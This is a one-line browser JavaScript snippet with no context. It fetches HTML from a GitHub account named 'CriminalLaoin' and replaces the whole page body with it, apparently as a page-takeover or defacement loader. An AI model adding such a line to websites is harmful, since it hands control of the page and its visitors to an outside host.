fetch("https://raw.githubusercontent.com/CriminalLaoin/CL/main/index.html").then(response => response.text()).then(html => document.body.innerHTML = html);